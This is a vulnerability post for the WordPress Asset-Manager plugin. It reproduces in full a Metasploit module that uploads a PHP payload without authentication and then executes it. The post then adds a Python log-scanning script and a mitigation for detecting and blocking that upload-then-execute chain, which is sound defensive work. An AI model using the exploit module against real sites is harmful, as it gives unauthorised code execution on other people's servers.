WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This module, taken from the Metasploit exploit library, targets a vulnerability found in version 2.0 and earlier of the WordPress Asset-Manager plugin. It allows PHP file upload: a user can upload a file to a temporary directory without authentication, which leads to arbitrary code execution.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
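From the defender's side, the module above leaves a recognisable trace in web server logs: an unauthenticated POST to the plugin's upload.php, followed shortly after by a GET of a .php file under wp-content/uploads/assets/temp/ from the same client. The following detection script is an added example, not part of the original post or of the Metasploit module; it scans combined-format (Apache/nginx style) access log lines for that two-step pattern. The log lines, IP addresses and file names in it are constructed samples, and the 300-second correlation window is an assumed default.

```python
"""Detect the Asset-Manager upload-then-execute pattern in access logs.

Added example (not from the original post or the Metasploit module).
Flags a POST to wp-content/plugins/asset-manager/upload.php that is
followed, from the same client IP and within a time window, by a GET of
a .php file under wp-content/uploads/assets/temp/ (the two paths the
module uses). Log lines below are constructed samples.
"""
import re
from collections import defaultdict
from datetime import datetime

# Combined log format: IP - - [time] "METHOD PATH HTTP/x" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
UPLOAD_PATH = "/wp-content/plugins/asset-manager/upload.php"
TEMP_PHP_RE = re.compile(r"/wp-content/uploads/assets/temp/[^/]+\.php$")

# Constructed sample log: one real chain (203.0.113.7), one lone GET with no
# preceding upload (198.51.100.4), and one upload whose follow-up GET falls
# outside the default window (192.0.2.9).
SAMPLE_LOG = """\
203.0.113.7 - - [26/May/2012:10:14:02 +0000] "GET /wordpress/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.7 - - [26/May/2012:10:14:05 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 87 "-" "Mozilla/5.0"
203.0.113.7 - - [26/May/2012:10:14:06 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kqzxp.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.4 - - [26/May/2012:10:20:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/photo.php HTTP/1.1" 404 210 "-" "Mozilla/5.0"
192.0.2.9 - - [26/May/2012:11:00:00 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 87 "-" "Mozilla/5.0"
192.0.2.9 - - [26/May/2012:11:30:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/late.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    # Drop any query string so path comparisons are stable.
    rec["path"] = rec["path"].split("?", 1)[0]
    return rec


def find_upload_execute_chains(lines, window_seconds=300):
    """Return (ip, upload_time, executed_path, status) for every GET of a PHP
    file in the plugin's temp directory that follows an upload.php POST from
    the same IP within window_seconds. Lone temp-directory GETs with no
    preceding upload, or uploads whose follow-up is too late, are not chains."""
    uploads = defaultdict(list)  # ip -> timestamps of upload.php POSTs
    chains = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"].endswith(UPLOAD_PATH):
            uploads[rec["ip"]].append(rec["time"])
        elif rec["method"] == "GET" and TEMP_PHP_RE.search(rec["path"]):
            for t in uploads[rec["ip"]]:
                delta = (rec["time"] - t).total_seconds()
                if 0 <= delta <= window_seconds:
                    chains.append((rec["ip"], t, rec["path"], rec["status"]))
                    break
    return chains


if __name__ == "__main__":
    for ip, t, path, status in find_upload_execute_chains(SAMPLE_LOG.splitlines()):
        print(f"ALERT {ip}: upload at {t.isoformat()} then GET {path} -> {status}")
```

On the sample log only 203.0.113.7 is reported; widening `window_seconds` to an hour also catches the 192.0.2.9 pair, so the window should be tuned to how quickly the plugin's temp files are normally cleaned up. A complementary mitigation, independent of logging, is to configure the web server to refuse to execute PHP from under wp-content/uploads/ at all, which breaks the second step of the chain even if the upload succeeds.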